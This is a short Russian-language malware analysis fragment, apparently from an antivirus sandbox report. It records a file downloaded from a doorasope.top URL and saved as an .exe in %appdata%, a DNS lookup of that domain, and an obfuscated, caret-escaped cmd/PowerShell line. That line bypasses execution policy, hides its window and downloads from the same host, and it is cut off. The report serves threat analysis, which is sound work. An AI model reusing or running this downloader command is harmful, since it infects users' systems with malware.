Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^weRS^He^Ll.^E^XE -e^Xe^CUTi^oN^pOl^ICy BYP^ass^ ^-noPro^FI^l^e^ -^wi^N^DoW^stYl^e^ ^Hi^DDE^N (NE^W^-oBj^Ec^T SysT^e^m.NeT.wEbC^LiEN^T).do^wnLOad^f^Ile('http://www.doora...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "p^O^weRS^He^Ll.^E^XE -e^Xe^CUTi^oN^pOl^ICy BYP^ass^ ^-noPro^FI^l^e^ -^wi^N^DoW^stYl^e^ ^Hi^DDE^N (NE^W^-oBj^Ec^T SysT^e^m.NeT.wEbC^LiEN^T).do^wnLOad^f^Ile('http://www.doora...' (со скрытым окном)